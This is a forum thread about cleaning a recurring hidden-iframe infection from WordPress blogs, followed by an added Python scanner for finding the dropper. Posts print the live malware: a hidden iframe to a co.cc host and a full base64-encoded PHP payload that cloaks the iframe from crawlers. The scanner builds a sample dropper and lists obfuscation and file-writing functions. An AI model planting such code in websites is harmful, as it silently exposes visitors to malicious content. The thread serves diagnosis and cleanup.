
My blogs are hijacked with iframe injection - Please help!

Discussion in 'Black Hat SEO' started by air360, Feb 26, 2011.

  1. air360

    Ok, so it's kind of my own fault I suppose... but I grabbed a copy of the backupbuddy from one of the threads here to clone a blog... worked like a charm, and then I went to the website and I got warned that there was malicious code detected. After looking at the source I have this at the top, even above the header:

    Code:
    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://gwqagehfdjhfd.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="10" height="10"></iframe></div>
    I then noticed that it had infected every blog I have hosted on my server. I immediately deleted everything related to backupbuddy and went through and uploaded clean copies of index.html and thought I was good... but a few hours later I noticed it had modified all my index.html files again and was back (with a different URL).

    I have now changed my FTP password, reuploaded a new index file and checked again for anything related to the backupbuddy that I could find... but I'm afraid it may come back again.

    Does anyone know how I can get rid of this stupid thing? It's gonna kill every one of my sites!
     
  2. sqhunter

    You may have to hire a guy from freelancer sites and pay $30-50 if the problem is deeply entrenched in your sites.
     
  3. air360

    Are there any steps or things I can do on my own to try and figure out where it's coming from?
     
  4. cyberroot

    In most cases iframe injections inject themselves in the database. Check the database once, and the PHP header files: what are they calling? I'm sure you will find the infection root!
     
  5. BugFixed

    Check header and footer, plugins, theme. Compare them with the original.
    From the database side, find that string like "co.cc" and delete it if it's there.
     
  6. air360

    Hmmm, when I do a search for "co.cc" on information_schema it finds it (it even found the whole URL), but it won't let me delete from IS, so I am trying to find which database it is in... and so far those are all showing 0 for "co.cc".
     
  7. arbydee2

    This happened to me before when I used a cracked FTP program to upload one of my sites =x
     
  8. air360

    How did you fix it?
     
  9. arbydee2

    Deleted all the infected pages and changed my FTP password. Got myself a clean FTP copy as well.
     
  10. air360

    UPDATE: I found that I had multiple databases that had usernames that I had not created... ones like dh37qe6... so I deleted all those users. I found where I can look at running processes in my database and it showed one running process that I think might be related, but it would not let me delete it... said it may have already been killed.

    I have now removed my FTP client (FileZilla) and am redownloading a copy I'm sure is clean, and I have changed my FTP password. Next, once I get my FTP program back up and running, I'm going to go replace all the index.html files as they are all infected.

    The only thing that worries me is I still have not been able to find or delete any "co.cc" string from any database... it finds "co.cc" in that running process but I can't figure out how to kill it (if it's not already killed like it says).

    So even after deleting these odd usernames and removing all the bad code from index, I am afraid it is still hidden somewhere that I am not being allowed access to (or to kill).
     
  11. cyberroot

    co.cc is a running process? Can't understand. Do you have shell access?? If yes, is it showing there as a running process on the server? If yes, you can kill that process and install chkrootkit and ClamAV antivirus on the server and try to clean your server... and for information_schema, are you trying to delete as user root? If not, login as root and try again...
     
  12. CyHead

    Wow, that's lethal. If the malware was really bad they could have done an SQL injection into every row/post with the iframe code.
     
  13. air360

    In MySQL the only place I can find a co.cc is in information_schema, which shows up like this in search results:

    (screenshot of the information_schema search result)

    It wouldn't let me do anything at all with this record (and I read that IS doesn't allow you to anyways, so that was not surprising).

    So I then went and looked at running processes and it shows this:

    (screenshot of the process list)

    And finally, when I try to kill the process I am presented with this:

    (screenshot of the kill attempt)

    I made sure my user account had complete shell access to everything before checking.

    Maybe it's not related... but considering that when searching, IS was the ONLY place I found co.cc, and I even found the parts of the actual iframed URL when searching IS, I know it's in there somewhere...
     
  14. air360

    This is driving me nuts! I thought I had it clean and then it was back after an hour!! Ugh!
     
  15. air360

    Let me just add this... the first line with the iframe is the code that I am seeing on every index.html page... it is the only main difference I see compared to a clean site.

    Code:
    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://gwst3wgsdhsd.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="1" height="1"></iframe></div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
    
    <head profile="http://gmpg.org/xfn/11">
    
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    
    And if I download the infected index.php file and open it locally I get the coded file below:

    Code:
    <?php eval(base64_decode('...'));
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    Idk if this helps anyone with any suggestions or not...

    Every time I replace a clean index file it changes back to this within two hours.
     
  16. lexblast

    Code:
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1
IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2dlc2E0bmZkZmouY28uY2MvUVFrRkJnMEFBUTBNQkEwREVrY0pCUVlOREFBQ0Jnd0hCQT09IiB3aWR0aD0iMTAiIGhlaWdodD0iMTAiPjwvaWZyYW1lPjwvZGl2Pic7DQp9'));
    So that is what's missing from your clean index.php?
     
  17. BugFixed

    This might help you:
    Code:
    http://hubpages.com/hub/How-To-Remove-The-evalbase64_decode-Virus
     
  18. air360

    Yes, but if I view it in the source code it looks like this:
    Code:
    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://gwst3wgsdhsd.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="1" height="1"></iframe></div>
    So what I tried doing was simply replacing index.html with a clean copy of it, and it stays clean for about an hour and then it comes right back to having the code again. Only if I look at the actual code itself by downloading the index.php locally do I see it in the base64 form.

    I will try this... the only thing is it only seems to be infecting my index.html. I can also remove it as I just said above, but it seems to come back... but I will surely give this a try!

    I use DreamHost btw (I know they kinda suck, but they have always been good to me and were the first ones I signed up with a long time ago... so I had not really seen the need to switch to the more popular ones... but I might after all this crap).
     
  19. BugFixed

    If you can't find it in the cron jobs, the last possibility is at the hosting server level.
     
  20. lexblast

    The index.php is being rewritten and the base64 code is being inserted, which translates to what you see in the source.

    This doesn't have to happen via a cron job; it could happen any time the site is loaded, from any number of includes.

    I'd probably start by searching all of the infected sites' source code looking for PHP code that could rewrite the index.php file, such as fopen, fwrite, etc.
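lexblast's advice above (search every infected site's source for PHP that can rewrite index.php) is the hunt for the reinfection source, and the one-to-two-hour comeback the thread reports fits a dropper that runs on ordinary page loads rather than a cron job. The Python below is an added example written for this page, not code from the thread: it walks a webroot, flags PHP files that call file-writing primitives (fopen, fwrite and the usual alternatives) or obfuscation helpers, and separately lists files modified within a time window, since a freshly touched file in an uploads or cache directory is the usual place such a dropper hides. The miniature webroot it scans is constructed in a temp directory; the stand-in dropper path `wp-content/uploads/cache/.thumb.php`, the function lists and all function names are my own.

```python
import os
import re
import tempfile
import time

# PHP calls that can rewrite a file on disk: the ones lexblast names plus the
# usual alternatives. Constructed list for this example, not exhaustive.
WRITE_PRIMITIVES = ("fopen", "fwrite", "fputs", "file_put_contents", "rename", "copy")
# Functions that usually wrap the hidden part of a dropper.
OBFUSCATION = ("eval", "base64_decode", "gzinflate", "gzuncompress", "str_rot13")

WRITE_RX = re.compile(r"\b(" + "|".join(WRITE_PRIMITIVES) + r")\s*\(")
OBFUSCATION_RX = re.compile(r"\b(" + "|".join(OBFUSCATION) + r")\s*\(")


def scan_php_tree(root):
    """Map each PHP file under root (relative path) to the suspicious calls it makes."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            hits = {m.group(1) for m in WRITE_RX.finditer(src)}
            hits |= {m.group(1) for m in OBFUSCATION_RX.finditer(src)}
            if hits:
                findings[os.path.relpath(path, root)] = sorted(hits)
    return findings


def recently_modified(root, within_seconds, now=None):
    """Relative paths of files under root whose mtime falls inside the window."""
    now = time.time() if now is None else now
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if now - os.path.getmtime(path) <= within_seconds:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample_tree():
    """Constructed miniature webroot in a temp dir; the dropper path is made up."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n",
        "wp-content/themes/demo/functions.php": "<?php\nadd_action('init', 'demo_init');\n",
        # Stand-in for the file that keeps re-infecting index.php: pulled in on a
        # normal page load, it rewrites index.php with a decoded blob ('Li4u' is just "...").
        "wp-content/uploads/cache/.thumb.php": (
            "<?php\n$target = $_SERVER['DOCUMENT_ROOT'] . '/index.php';\n"
            "$body = base64_decode('Li4u');\n"
            "$h = fopen($target, 'w'); fwrite($h, $body); fclose($h);\n"
        ),
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    # Age the legitimate files by 30 days so only the dropper looks freshly written.
    old = time.time() - 30 * 86400
    for rel in ("index.php", "wp-content/themes/demo/functions.php"):
        os.utime(os.path.join(root, rel), (old, old))
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, calls in scan_php_tree(root).items():
        print(f"{rel}: {', '.join(calls)}")
    print("modified in the last hour:", recently_modified(root, 3600))
```

Point `scan_php_tree` at the real webroot instead of the sample tree. Legitimate WordPress core and plugins also call these functions, so treat hits as candidates and compare each flagged file against a pristine copy, as BugFixed suggests above; a hit that has no counterpart in the clean install, sits under uploads or cache, and shows a recent mtime is the one to examine first.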